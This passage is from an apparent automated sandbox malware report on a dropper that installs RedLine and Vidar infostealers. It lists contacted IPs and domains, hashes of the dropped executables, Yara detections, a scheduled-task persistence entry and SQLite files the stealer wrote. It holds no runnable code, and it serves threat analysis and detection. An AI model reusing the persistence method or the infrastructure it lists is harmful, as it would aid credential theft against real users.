http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en-US/chrome/blank.html	craw_background.js.3.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	namdoitntn.exe, 0000001A.00000002.851370815.0000000002551000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.845974548.0000000002861000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.842485073.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	namdoitntn.exe, 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, ffnameedit.exe, 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.209.4	www.google.com	United States	15169	GOOGLEUS	false
8.8.4.4	dns.google	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
135.181.104.248	unknown	Germany	24940	HETZNER-ASDE	false
142.251.209.35	unknown	United States	15169	GOOGLEUS	false
148.251.234.83	iplogger.org	Germany	24940	HETZNER-ASDE	false
195.54.170.157	unknown	unknown	51171	VALICOM-ASPT	false
185.191.229.101	insttaller.com	Netherlands	64236	UNREAL-SERVERSUS	false
142.250.180.141	accounts.google.com	United States	15169	GOOGLEUS	false
45.95.11.158	unknown	Italy	13487	ULTRA-PACKETUS	true
104.22.1.232	cutt.ly	United States	13335	CLOUDFLARENETUS	false
162.159.133.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
176.113.115.146	unknown	Russian Federation	49505	SELECTELRU	false
103.89.90.61	unknown	Viet Nam	135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
142.251.209.46	clients.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.184.42	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1
192.168.2.6
192.168.2.5
192.168.2.23
127.0.0.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	688476
Start date and time:	2022-08-23 03:41:11 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 20m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	WSkT8d093C.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	54
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@120/191@14/22
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 14.9% (good quality ratio 10%) Quality average: 33.5% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 55 Number of non-executed functions: 127
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.209.3, 142.250.184.78, 173.194.160.70
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, r2---sn-1gi7znes.gvt1.com, r1---sn-1gi7znes.gvt1.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r1.sn-1gi7znes.gvt1.com, arc.msn.com, r1---sn-4g5edn6r.gvt1.com
Execution Graph export aborted for target WSkT8d093C.exe, PID 6016 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:46:45	Task Scheduler	Run new task: COMSurrogate path: C:\Users\user\TypeRes\DllResource.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	347136
Entropy (8bit):	6.626098895117023
Encrypted:	false
SSDEEP:	6144:Y7v3qLsCqxXXFaNOq7trETZdZjPLUQxIAi/9xlNtQ/3N:Y7vbfQOkrETZdZjPv10RNk
MD5:	501E0F6FA90340E3D7FF26F276CD582E
SHA1:	1BCE4A6153F71719E786F8F612FBFCD23D3E130A
SHA-256:	F07D918C6571F11ABF9AB7268AC6E2ECBCD931C3D9D878895C777D15052AAE2B
SHA-512:	DEE3AABFCA7912F15B628253222CFE8D8E13CD64F0438E8D705B68B0A14B4C9523B7A207583BE7B424E444D6B05F237484A0C38BF2E075D347EF937D409A3A69
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 64%, Browse Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)./.H.\|.H.\|.H.\|..+\|.H.\|..(\|.H.\|..>\|.H.\|...\|.H.\|.H.\|.H.\|..9\|.H.\|..)\|.H.\|..,\|.H.\|Rich.H.\|................PE..L.....@a.................r...~.......4............@.........................................................................dq..P................................... ...............................`...@............................................text...xq.......r.................. ..`.data...Hv...........v..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\WW1.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	289792
Entropy (8bit):	6.577062814012659
Encrypted:	false
SSDEEP:	6144:5RkvX/oM13YFXHmI4SSKdOctknX59Zzm0PxwJ:3Wp13YFXO9nX59ZS0CJ
MD5:	86C2F03BBB61BDCAF1AE4BFB22CC2D31
SHA1:	BD4D43346FDA88073A2832AA68A832DA7FBA92D2
SHA-256:	68E686F07EAB2A6D3DA3E045E5A27614B6225AECD5E373D3E788281207F7EE3C
SHA-512:	4D9F01819D8D8536A0B0E17DA8742CC2D01240A899E00F5338DB8FC0A37536A16C4F1A112475C5F6A017DB534144819CE8D6A22F1C346D38363854208C6A01D1
Malicious:	true
Yara Hits:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L......c................. ...~...............0....@.......................................@.....................................(............................p..\<......................................@............0..L............................text...[........ .................. ..`.rdata..h....0.......$..............@..@.data....Q..........................@....reloc..hL...p...N..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\brokerius.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	6.579401645714669
Encrypted:	false
SSDEEP:	6144:bsMZN00ag9n0A12I4azih0o3n4+nKyIXszhO3UJcC:tN0ng9nB1+a+nKyPFOkJcC
MD5:	F5D13E361F8B9ACA7103CB46B441034B
SHA1:	090DCC68F4CE59D1C5B8B7424508C4033EE418DD
SHA-256:	A5AD514ED54F1F8F0A8E054B0DC3A39D13D70E388711DDB9D44095A5A89317BF
SHA-512:	DB8F615405C3DCBB2E525903A572E13565F184BC8C1A2674138A84774DD06041A9899006B8599A25F06CE4FBA92C12D102772E74BE62AC6D02B5BC0AC4EE124A
Malicious:	true
Yara Hits:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L...M..c................."...~......]........@....@.......................................@.................................\|...(................................<......................................@............@..L............................text...8!.......".................. ..`.rdata.......@.......&..............@..@.data....Q... ......................@....reloc...L.......N... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\captain09876.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	721408
Entropy (8bit):	4.496128932092844
Encrypted:	false
SSDEEP:	3072:gvGyYiSDnt1k5vWp1icKAArDZz4N9GhbkENEkEMEwnuxm9G01vbLque0Ys8L9dZs:E4Dp0yN90vEvMEwnF1vCuU4QxomgOa
MD5:	CE94CE7DE8279ECF9519B12F124543C3
SHA1:	BE2563E381439ED33869A052391EEC1DDD40FAA0
SHA-256:	F88D6FC5FD36EF3A9C54CF7101728A39A2A2694A0A64F6AF1E1BEFACFBC03F20
SHA-512:	9697CFC31B3344A2929B02ECDF9235756F4641DBB0910E9F6099382916447E2D06E41C153FAD50890823F068AE412FB9A55FD274B3B9C7929F2CA972112CC5B7
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......le.Z(...(...(...Mb..)...Mb..*...Mb..:...Mb..9...(.......Mb..!...Mbh.)...Mb..)...Rich(...........................PE..d................."......t...........y.........@.............................`...........`.......... ...................................................Z...................P.. .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc....Z.......\..................@..@.reloc.. ....P......................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	5.748182533197244
Encrypted:	false
SSDEEP:	3072:scvFBgCYypi5IN/QQC3gltr/QcnzHTshR4EASNT:scv+uQ3gl5Ic/shR4jS
MD5:	3243054D3ACD513ABCC72EE1D1B65C97
SHA1:	D23AFD7EF0F4CC3CF5A492B7D46B557C7BC11CB3
SHA-256:	5BC24A5DEA878774CE9C928A13F007E6AC604474349F33CE4F946AA4B7189CCC
SHA-512:	931C3735474A70EBDFC3B849448532B782062C1228079CA9A9367CD6E4D5CF181AE794427BECC85D7921703D0288D6639682A858F3A43338B679258D7D29E6E3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jf-...............0................. ........@.. ....................................@.................................t...O...................................X................................................ ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\jshainx.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	5.74839124004363
Encrypted:	false
SSDEEP:	3072:9cvFBgCYKpi8IVJFKQ6OUxuvQc0ZpDHh64EASNh:9cv+t36jo4c+Hh64jS
MD5:	2647A5BE31A41A39BF2497125018DBCE
SHA1:	A1AC856B9D6556F5BB3370F0342914EB7CBB8840
SHA-256:	84C7458316ADF09943E459B4FB1AA79BD359EC1516E0AD947F44BDC6C0931665
SHA-512:	68F70140AF2AD71A40B6C884627047CDCBC92B4C6F851131E61DC9DB3658BDE99C1A09CAD88C7C922AA5873AB6829CF4100DC12B75F237B2465E22770657AE26
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .................0................. ........@.. ....................................@.....................................O...................................d................................................ ............... ..H............text...@.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	775168
Entropy (8bit):	6.7110819961841575
Encrypted:	false
SSDEEP:	12288:7RUQ/DK21WSRL3oXY+/zNi7Dha0pePTvJRXYBVMAqn4jNZYXm0ipZZBPA76:77zXL3oXVw700pe7zXYBVgn4jNZYXdik
MD5:	3EC059BD19D6655BA83AE1E644B80510
SHA1:	61FA49D4473E91509B32A3B675A236B1EAB74D08
SHA-256:	7DC81DC72CB4F89AD022BB15419E1B6170CF77942B8EC29839924B7B4FE7896C
SHA-512:	5324C3A902B96D5782E01DD0BFB177055A6908112C60C85AF49C7E863B62F0947D6E18D5AC370652008C5983B0C8BD762AB4444822D0AD547A88883970ADABE9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................".........../.......@....@..........................P...................@..............................H$.................................................................................................................CODE..... .......".................. ..`DATA.....'...@...(...&..............@...BSS.....9....p.......N...................idata..H$.......&...N..............@....tls.................t...................rdata...............t..............@..P.reloc..............v..............@..P.rsrc..............................@..P.............P......................@..P........................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	5.749974684688708
Encrypted:	false
SSDEEP:	3072:NcvFB4CYHpiVIlf0By1C+4IQclHbTTh/4EASNB:NcvGt91Cdxc9Th/4jS
MD5:	BBD8EA73B7626E0CA5B91D355DF39B7F
SHA1:	66E298653BEB7F652EB44922010910CED6242879
SHA-256:	1AA3FDC24E789B01A39944B85C99E4AC08864D2EAE7530164CEA2821ACBF184E
SHA-512:	625CC9C108B4660030BE1282493700E5F0CCFB973F466F61254ED1E1A96F5F042CDEAA94607825A2F694647468E2F525A6451542FE3AAC785EBAC1CCFE39864F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ........@.. ....................................@.................................p...O...................................T................................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1810960
Entropy (8bit):	7.956922547006569
Encrypted:	false
SSDEEP:	49152:SdAhjSod/EhksaOenaSJP0BOE5yM5gPHVtC30:SdAhjSOshksaOQRaL5g9Ak
MD5:	63FD052610279F9EB9F1FEE8E262F2A4
SHA1:	AAC344ED6F54C367BE51EFFBF6E84128EE8C6992
SHA-256:	955C265A378008EFEE8F0D19C2880D1026F32F7CD6325E0AB1A24C833905BBBA
SHA-512:	234BC89538336452938FBE1E6774F5F7CA47C735F871AC3BA54A3EA6B68C48970FC53239EA72D5CA176F3ACC00932E479020C38CAD66A0F70A3ACDA5B5AFF9B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.u.\.u.\.u.3...T.u.3.....u.U...Y.u.\.t..u.3...S.u.3...].u.\...Z.u.3...].u.Rich\.u.........................PE..L...\|..X............................`R............@.................................u.......................................d...<.......(............................................................*..@...............8............................text............................... ..`.data....;..........................@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\real.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	281600
Entropy (8bit):	6.550690374072991
Encrypted:	false
SSDEEP:	6144:FQyRaGpZUMRY7Sh2I4fLicjusxZrJnAl9l:FHLpZUM/h+LnxZrJnAl
MD5:	A2414BB5522D3844B6C9A84537D7CE43
SHA1:	56C91FC4FE09CE07320C03F186F3D5D293A6089D
SHA-256:	31F4715777F3BE6A4A7B34BAF25EBFC7AF32DD9A2AAE826FC73DCA6C44FDA173
SHA-512:	408EBB002B3BDB77DC243CED28D852801E68E5FF0DBFA450D3E91B89311FE6A3E8473E749619C285C1A5427D8A117350A3798435ED38B56D1A230F0AE270EC60
Malicious:	true
Yara Hits:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\real.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..`"..`"..`"......`".....c`"......`"......`"..`#..`"......`"......`".Rich.`".........PE..L...X..b.....................f......=........0....@.......................................@.....................................<............................`...8......................................@............0..H............................text............................... ..`.rdata.......0......................@..@.data....Q..........................@....reloc...H...`...J..................@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Company\NewProduct\safert44.exe

Download File

Process:	C:\Users\user\Desktop\WSkT8d093C.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	251904
Entropy (8bit):	5.913622549255359
Encrypted:	false
SSDEEP:	6144:i35DsWXcPE0JmESvS85n/f+jEaZfdSsbArGx/KjObJguq:f3KvF5n/f+jEaZfdSsbArGx/KjObJgv
MD5:	414FFD7094C0F50662FFA508CA43B7D0
SHA1:	6EC67BD53DA2FF3D5538A3AFCC6797AF1E5A53FB
SHA-256:	D3FB9C24B34C113992C5C658F6A11F9620DA2E49D12D1ACABE871E1BEA7846EE
SHA-512:	C6527077B4822C062E32C39BE06E285916B501A358991D120A469F5DA1E13D282685CA7CA3FA938292D5BEEF073FBEA42FF9BA96FA5C395F057F7C964608A399
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.................0.................. ........@.. .......................@............@.................................d...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........N......:....................................................m..3>.r...f.gY.D"...E.2V~...x...h.\.{.yO8...z'...[^....}..T.w...T.:.Z.<...>j(.....8:PH4....\|.r)V6I.C{m.........I.\|..s..`.".#../..'.@Z.<..$.....bb..Y%k....`&....N.Q....-.S.Mv#gS.e. .c...U......}.......+.......S....h...C..\..;.eD.0......m...?..b.r..0E.q>.f4!./X........o..F.k.tj..B.i.Rv.....@...-L.u...R.-.K_/w.VP..EMd.j1....=......t.R....&.1m.#:.n.j...'..\|...H...NB.D.F..s..sU.6._o.

C:\ProgramData\17497621430459573874046227

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\58324431181746845160668286

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\58648046762479320730390942

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.4755077381471955
Encrypted:	false
SSDEEP:	96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
MD5:	DEE86123FE48584BA0CE07793E703560
SHA1:	E80D87A2E55A95BC937AC24525E51AE39D635EF7
SHA-256:	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
SHA-512:	65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\59095662396535248957003083

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.8192288767297565
Encrypted:	false
SSDEEP:	384:tRab+d5nemTLMuRpHDiEwABBE3uPab+QuJdB:tRab+dVemPiEZBBjPab+QuJdB
MD5:	080C7890BA3BE9FF5F1CBB899794CCE3
SHA1:	CEEE0A5DC750D008A47FFB7879A39E886BCA799F
SHA-256:	65BEBBD167C7634C0F3DF36834CB2695C499FA1044A801D49BF16BA711940EA1
SHA-512:	34AC31351F20545BC9E215EBF577F46283D1D8F794D5688715F882B24320E9F560381396FDCE899961E5ACA1FFC50F4116128157D69D71505DD0316CC7EC0CC2
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\65360530329811159659501815

Download File

Process:	C:\Program Files (x86)\Company\NewProduct\real.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.8192288767297565
Encrypted:	false
SSDEEP:	384:tRab+d5nemTLMuRpHDiEwABBE3uPab+QuJdB:tRab+dVemPiEZBBjPab+QuJdB
MD5:	080C7890BA3BE9FF5F1CBB899794CCE3
SHA1:	CEEE0A5DC750D008A47FFB7879A39E886BCA799F
SHA-256:	65BEBBD167C7634C0F3DF36834CB2695C499FA1044A801D49BF16BA711940EA1
